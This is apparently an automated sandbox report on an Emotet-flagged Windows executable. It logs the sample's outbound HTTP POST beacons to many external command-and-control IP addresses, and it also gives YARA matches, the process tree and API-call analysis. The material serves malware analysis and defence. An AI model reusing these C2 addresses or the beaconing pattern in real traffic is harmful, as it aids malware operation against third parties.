                                   Aug 20, 2024 17:47:28.283018112 CEST | 549 | OUT | POST /3c7L3qI9O7w/Rm0uJBYq9TtaH/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 120.138.30.150/3c7L3qI9O7w/Rm0uJBYq9TtaH/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=---------------VnrwklFt5SvgEBv
                                  Host: 120.138.30.150:8080
                                  Content-Length: 4660
                                  Cache-Control: no-cache


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   3 | 192.168.2.12 | 49724 | 94.23.216.33 | 80 | 6716 | C:\Windows\SysWOW64\provcore\Websocket.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   Aug 20, 2024 17:47:32.858660936 CEST | 542 | OUT | POST /4sERDG3EhH4jL/eJgQIlw4kZ/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 94.23.216.33/4sERDG3EhH4jL/eJgQIlw4kZ/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=-----------------dNvw9ZmlFxNAzGF12
                                  Host: 94.23.216.33
                                  Content-Length: 4660
                                  Cache-Control: no-cache
                                   Aug 20, 2024 17:47:32.858719110 CEST | 4660 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 4e 76 77 39 5a 6d 6c 46 78 4e 41 7a 47 46 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 76 77 6b 71
                                  Data Ascii: -------------------dNvw9ZmlFxNAzGF12Content-Disposition: form-data; name="vwkqjvubdwyo"; filename="lldklmbdve"Content-Type: application/octet-streamHmAo2_(,k5$hS&jh#bRPUMD#O


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   4 | 192.168.2.12 | 49725 | 157.245.99.39 | 8080 | 6716 | C:\Windows\SysWOW64\provcore\Websocket.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   Aug 20, 2024 17:47:35.971529961 CEST | 605 | OUT | POST /iak3uhyFk7lpr6JuOK/tB1LHPYJU1WTt8sLQn/ANk4kL9bS/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 157.245.99.39/iak3uhyFk7lpr6JuOK/tB1LHPYJU1WTt8sLQn/ANk4kL9bS/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=----------------------0xXrF4Ymva2woSLWTDYnAi
                                  Host: 157.245.99.39:8080
                                  Content-Length: 4660
                                  Cache-Control: no-cache


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   5 | 192.168.2.12 | 49726 | 137.59.187.107 | 8080 | 6716 | C:\Windows\SysWOW64\provcore\Websocket.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   Aug 20, 2024 17:47:38.201150894 CEST | 619 | OUT | POST /JN2DplxF92Pi/qZ21yDZ4M/ris4gHcOGLF4hcPHwQ/A1nU/6tibZPGO3hJC/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 137.59.187.107/JN2DplxF92Pi/qZ21yDZ4M/ris4gHcOGLF4hcPHwQ/A1nU/6tibZPGO3hJC/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=----------------yA0yv22gQqHz91Fm
                                  Host: 137.59.187.107:8080
                                  Content-Length: 4660
                                  Cache-Control: no-cache


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   6 | 192.168.2.12 | 62404 | 94.23.237.171 | 443 | 6716 | C:\Windows\SysWOW64\provcore\Websocket.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   Aug 20, 2024 17:48:03.378998041 CEST | 588 | OUT | POST /QhMD6KpexuBHSeyg/nmjgYh4l4ptvB/PGvKi7u5nK/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 94.23.237.171/QhMD6KpexuBHSeyg/nmjgYh4l4ptvB/PGvKi7u5nK/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=--------------------8l9iSdFwjKbTCnC5XLPO
                                  Host: 94.23.237.171:443
                                  Content-Length: 4628
                                  Cache-Control: no-cache


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   7 | 192.168.2.12 | 62405 | 61.19.246.238 | 443 | 6716 | C:\Windows\SysWOW64\provcore\Websocket.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   Aug 20, 2024 17:48:07.059957027 CEST | 506 | OUT | POST /Gm1WL3Kb/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 61.19.246.238/Gm1WL3Kb/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=------------H7vKgpo0TK2t
                                  Host: 61.19.246.238:443
                                  Content-Length: 4628
                                  Cache-Control: no-cache


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   8 | 192.168.2.12 | 62406 | 156.155.166.221 | 80 | 6716 | C:\Windows\SysWOW64\provcore\Websocket.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   Aug 20, 2024 17:48:10.488987923 CEST | 582 | OUT | POST /yeefk/tw301PEhQBGehUNW/CiErQs/MRjdl7CYu1IU7v3m15J/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 156.155.166.221/yeefk/tw301PEhQBGehUNW/CiErQs/MRjdl7CYu1IU7v3m15J/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=---------84P2IJMkL
                                  Host: 156.155.166.221
                                  Content-Length: 4628
                                  Cache-Control: no-cache
                                   Aug 20, 2024 17:48:10.488987923 CEST | 4628 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 34 50 32 49 4a 4d 6b 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 62 65 76 66 6c 70 73 6e 63 66 6d 62 22 3b 20 66 69 6c 65
                                  Data Ascii: -----------84P2IJMkLContent-Disposition: form-data; name="tbevflpsncfmb"; filename="gpkguma"Content-Type: application/octet-stream[D\xA*8HK`uEu8-)hFg8_qp {ZBfR&ua3-


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   9 | 192.168.2.12 | 62407 | 50.35.17.13 | 80 | 6716 | C:\Windows\SysWOW64\provcore\Websocket.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   Aug 20, 2024 17:48:13.365008116 CEST | 580 | OUT | POST /nrCUrCE2yDTiIo4a/5Gs4u/KUPipnX9S5yDUVyF8b/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 50.35.17.13/nrCUrCE2yDTiIo4a/5Gs4u/KUPipnX9S5yDUVyF8b/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=--------------------pU7FVH6UNlQM04HdUu46
                                  Host: 50.35.17.13
                                  Content-Length: 4628
                                  Cache-Control: no-cache
                                   Aug 20, 2024 17:48:13.365048885 CEST | 4628 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 70 55 37 46 56 48 36 55 4e 6c 51 4d 30 34 48 64 55 75 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65
                                  Data Ascii: ----------------------pU7FVH6UNlQM04HdUu46Content-Disposition: form-data; name="clsguwwg"; filename="jrmsyryvcsmdyh"Content-Type: application/octet-streame6ygb;0ugc~!CC_bh:?=OJ0d0b@?C7


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   10 | 192.168.2.12 | 62408 | 153.137.36.142 | 80 | 6716 | C:\Windows\SysWOW64\provcore\Websocket.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   Aug 20, 2024 17:48:16.877501965 CEST | 596 | OUT | POST /ekpYWl8oCs7C/uUSPOoA/83Mn2qAQ2/yBWXbxwj/GOVd3DoQP6/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 153.137.36.142/ekpYWl8oCs7C/uUSPOoA/83Mn2qAQ2/yBWXbxwj/GOVd3DoQP6/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=----------------5UCIEVFUgKC9ns3t
                                  Host: 153.137.36.142
                                  Content-Length: 4628
                                  Cache-Control: no-cache
                                   Aug 20, 2024 17:48:16.877532959 CEST | 4628 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 35 55 43 49 45 56 46 55 67 4b 43 39 6e 73 33 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 71 6c 69 6e 69
                                  Data Ascii: ------------------5UCIEVFUgKC9ns3tContent-Disposition: form-data; name="bqlinitoyanh"; filename="oekzogwfmpjcauqobb"Content-Type: application/octet-streamxoZC0bRDDB"=gEoyHx9a1i3~oNz?C


                                  Session ID: 11, Source IP: 192.168.2.12, Source Port: 62409, Destination IP: 91.211.88.52, Destination Port: 7080, PID: 6716, Process: C:\Windows\SysWOW64\provcore\Websocket.exe
                                  Timestamp: Aug 20, 2024 17:48:19.954139948 CEST, Bytes transferred: 625, Direction: OUT, Data:
                                  POST /UgjaCEdTc9AlgOLmob/lJ2pCDETY/jJXL8eM/bkqmaKbdvAGP/AYsIr7b4/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 91.211.88.52/UgjaCEdTc9AlgOLmob/lJ2pCDETY/jJXL8eM/bkqmaKbdvAGP/AYsIr7b4/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=----------------------ayNnG1JNfmOIUancEJINhP
                                  Host: 91.211.88.52:7080
                                  Content-Length: 4628
                                  Cache-Control: no-cache


                                  Session ID: 12, Source IP: 192.168.2.12, Source Port: 62410, Destination IP: 209.141.54.221, Destination Port: 8080, PID: 6716, Process: C:\Windows\SysWOW64\provcore\Websocket.exe
                                  Timestamp: Aug 20, 2024 17:48:22.190536976 CEST, Bytes transferred: 525, Direction: OUT, Data:
                                  POST /mf37D3hHo2BT/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 209.141.54.221/mf37D3hHo2BT/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=----------------CRPJROu8mMuITH9V
                                  Host: 209.141.54.221:8080
                                  Content-Length: 4628
                                  Cache-Control: no-cache


                                  Session ID: 13, Source IP: 192.168.2.12, Source Port: 62411, Destination IP: 185.94.252.104, Destination Port: 443, PID: 6716, Process: C:\Windows\SysWOW64\provcore\Websocket.exe
                                  Timestamp: Aug 20, 2024 17:48:24.555603981 CEST, Bytes transferred: 682, Direction: OUT, Data:
                                  POST /iXgMw5IajHPl8YAN7YB/fMpMhY2ZgzV/1nmECrP2Ezqoam/NWXlULDZs3bsJjB/p3LYI79/w2aCyOD7bcdtE/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 185.94.252.104/iXgMw5IajHPl8YAN7YB/fMpMhY2ZgzV/1nmECrP2Ezqoam/NWXlULDZs3bsJjB/p3LYI79/w2aCyOD7bcdtE/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=-----------------------3hc2nliStBsMSODJE62qaln
                                  Host: 185.94.252.104:443
                                  Content-Length: 4628
                                  Cache-Control: no-cache


                                  Session ID: 14, Source IP: 192.168.2.12, Source Port: 62418, Destination IP: 174.45.13.118, Destination Port: 80, PID: 6716, Process: C:\Windows\SysWOW64\provcore\Websocket.exe
                                  Timestamp: Aug 20, 2024 17:48:27.434936047 CEST, Bytes transferred: 526, Direction: OUT, Data:
                                  POST /Ddrl52fpHV0Ytv/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 174.45.13.118/Ddrl52fpHV0Ytv/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=------------------BqLyxgk1GkivHaCG9j
                                  Host: 174.45.13.118
                                  Content-Length: 4628
                                  Cache-Control: no-cache
                                  Timestamp: Aug 20, 2024 17:48:27.434988022 CEST, Bytes transferred: 4628, Direction: OUT, Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 42 71 4c 79 78 67 6b 31 47 6b 69 76 48 61 43 47 39 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 76 72
                                  Data Ascii: --------------------BqLyxgk1GkivHaCG9jContent-Disposition: form-data; name="vrrhteskolrhp"; filename="buhxictpfvdxdd"Content-Type: application/octet-stream(|2q.A@8L{r*DoBRJXQT9&!5I~DaH


                                  Session ID: 15, Source IP: 192.168.2.12, Source Port: 62419, Destination IP: 87.106.136.232, Destination Port: 8080, PID: 6716, Process: C:\Windows\SysWOW64\provcore\Websocket.exe
                                  Timestamp: Aug 20, 2024 17:48:51.785458088 CEST, Bytes transferred: 569, Direction: OUT, Data:
                                  POST /gfPMhF/Be2SElHPLyLeACf/UucmketfQMMC3NqYN/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 87.106.136.232/gfPMhF/Be2SElHPLyLeACf/UucmketfQMMC3NqYN/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=----------5VkCfPKqCt
                                  Host: 87.106.136.232:8080
                                  Content-Length: 4628
                                  Cache-Control: no-cache


                                  Session ID: 16, Source IP: 192.168.2.12, Source Port: 62420, Destination IP: 62.75.141.82, Destination Port: 80, PID: 6716, Process: C:\Windows\SysWOW64\provcore\Websocket.exe
                                  Timestamp: Aug 20, 2024 17:48:57.138402939 CEST, Bytes transferred: 630, Direction: OUT, Data:
                                  POST /9HkMmi/SILN3JKyaX8hSqvMF38/aphjJUbJpUw/J8LsQXmX6qW1KnnNp/dmiOqQTXBol2TIb9pL/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 62.75.141.82/9HkMmi/SILN3JKyaX8hSqvMF38/aphjJUbJpUw/J8LsQXmX6qW1KnnNp/dmiOqQTXBol2TIb9pL/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=----------F7zfpJ936g
                                  Host: 62.75.141.82
                                  Content-Length: 4628
                                  Cache-Control: no-cache
                                  Timestamp: Aug 20, 2024 17:48:57.138427973 CEST, Bytes transferred: 4628, Direction: OUT, Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 46 37 7a 66 70 4a 39 33 36 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 67 77 78 65 77 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22
                                  Data Ascii: ------------F7zfpJ936gContent-Disposition: form-data; name="gwxew"; filename="psitexztpypnqpo"Content-Type: application/octet-stream=3qJea)/$[fM!z=e8MApb3Xt;o4kn';Ug,-+aUM;



                                  Target ID:0
                                  Start time:11:47:07
                                  Start date:20/08/2024
                                  Path:C:\Users\user\Desktop\ExeFile (356).exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\ExeFile (356).exe"
                                  Imagebase:0x400000
                                  File size:437'248 bytes
                                  MD5 hash:4C1C997C16309A2D391E1D39988000CC
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.2389548651.00000000020E4000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000000.00000002.2389548651.00000000020E4000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                  Reputation:low
                                  Has exited:true

                                  Target ID:2
                                  Start time:11:47:07
                                  Start date:20/08/2024
                                  Path:C:\Windows\SysWOW64\provcore\Websocket.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\SysWOW64\provcore\Websocket.exe"
                                  Imagebase:0x400000
                                  File size:437'248 bytes
                                  MD5 hash:4C1C997C16309A2D391E1D39988000CC
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.3637813859.0000000000734000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000002.00000002.3637813859.0000000000734000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.3637503164.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000002.00000002.3637503164.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                  Reputation:low
                                  Has exited:false

                                  Target ID:6
                                  Start time:11:47:52
                                  Start date:20/08/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                  Imagebase:0x7ff7d3e90000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:true
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false


                                    Execution Graph

                                    Execution Coverage:3.3%
                                    Dynamic/Decrypted Code Coverage:73.1%
                                    Signature Coverage:28.8%
                                    Total number of Nodes:420
                                    Total number of Limit Nodes:27
                                    execution_graph: node and edge listing of the rendered Execution Graph (420 nodes, 27 limit nodes). Entry nodes include 603060, 40ec40, 605c20, 607e39, 5f0000, 41092e, 40ea80 and 604a80. API calls annotated on the nodes are dominated by GetPEB, alongside RtlAllocateHeap, RtlFreeHeap, VirtualAlloc, VirtualProtect, VirtualFree, VirtualQuery, LoadLibraryW/LoadLibraryA, GetProcAddress, FreeLibrary, CreateFileW, SetFileInformationByHandle, DeleteFileW, FindFirstFileW/FindNextFileW/FindClose, CreateProcessW, OpenSCManagerW, Process32Next, CloseHandle, GetNativeSystemInfo, GetTickCount, GetCurrentProcessId, GetProcessHeap, IsBadHugeReadPtr, SetLastError, ExitProcess, and the CRT and Win32 GUI startup calls of the loader executable (GetStartupInfoW, HeapSetInformation, HeapCreate, GetCommandLineA, SetUnhandledExceptionFilter, TlsAlloc, LoadIconW, LoadCursorW, CreateThread, RegisterClassExW, CreateWindowExW, MessageBoxW, InitCommonControlsEx, SetTimer, ShowWindow, UpdateWindow, GetMessageW, TranslateMessage, DispatchMessageW).

                                    Control-flow Graph

                                    APIs
                                    • _memset.LIBCMT ref: 0040FA8E
                                    • LoadIconW.USER32 ref: 0040FAD2
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040FADF
                                    • LoadIconW.USER32 ref: 0040FB0B
                                    • CreateThread.KERNELBASE(00000000,00000000,Function_0000ECC0,00000000,00000002,?), ref: 0040FB23
                                    • RegisterClassExW.USER32(?), ref: 0040FB42
                                    • MessageBoxW.USER32(00000000,Call to RegisterClassEx failed!,Create Process,00000000), ref: 0040FB5B
                                    • CreateWindowExW.USER32(00000000,win32app,Windows Process Manager,00CF0000,80000000,80000000,000001B8,00000258,00000000,00000000,?,00000000), ref: 0040FBA4
                                    • MessageBoxW.USER32(00000000,Call to CreateWindow failed!,Win32 Guided Tour,00000000), ref: 0040FBBC
                                    Strings
                                    Memory Dump Source
                                     • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: Load$CreateIconMessage$ClassCursorRegisterThreadWindow_memset
                                    • String ID: 0$BUTTON$Call to CreateWindow failed!$Call to RegisterClassEx failed!$Cancel$Create Process$Edit$Kill Process$Run$View All Processes$Win32 Guided Tour$Windows Process Manager$win32app
                                    • API String ID: 713769167-1192827546
                                    • Opcode ID: 952da5468408a189c14926ca3cf5cae3a85ce14d76ca3222c90a6cd4c0bb2d80
                                    • Instruction ID: d065e50bf912697da28d798f56a1b3ea1efd5d731bf56130ae663ba60a7ce2a6
                                    • Opcode Fuzzy Hash: 952da5468408a189c14926ca3cf5cae3a85ce14d76ca3222c90a6cd4c0bb2d80
                                    • Instruction Fuzzy Hash: 9A8120B1BD4300BAF220DB50DC56FDA37A8AB98F05F10842AF7017A2D0D7F969458B5E

                                    Control-flow Graph

                                    APIs
                                    • LoadLibraryW.KERNEL32(020E4054,020E4040), ref: 020E1047
                                    • GetProcAddress.KERNEL32(00000000), ref: 020E104E
                                      • Part of subcall function 020E1B30: SetLastError.KERNEL32(0000000D,?,020E1070,?,00000040), ref: 020E1B3D
                                    • SetLastError.KERNEL32(000000C1), ref: 020E1096
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389523241.00000000020E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 020E1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_20e1000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: ErrorLast$AddressLibraryLoadProc
                                    • String ID:
                                    • API String ID: 1866314245-0
                                    • Opcode ID: 39a277d9abb3f7ada3974502ee139228ab0b7c7531012580cde144292d2959f7
                                    • Instruction ID: f17d650bd038c175acb5bcdb1fa688bcc818c9f7d3f8fc57d77390fc6a418cac
                                    • Opcode Fuzzy Hash: 39a277d9abb3f7ada3974502ee139228ab0b7c7531012580cde144292d2959f7
                                    • Instruction Fuzzy Hash: D4F1E6B4E01209EFDF04DF94D990BAEB7B1BF48304F108599E91AAB341D774AE91DB90

                                    Control-flow Graph

                                    APIs
                                    • CreateFileW.KERNELBASE(?,?,?,00000000,000A8C00,0100754F,00000000,000A8C00,?,00989680,?,?,00000000), ref: 00607EE5
                                    Strings
                                    Memory Dump Source
                                     • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                     • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID: DR$Ou$fX
                                    • API String ID: 823142352-261343277
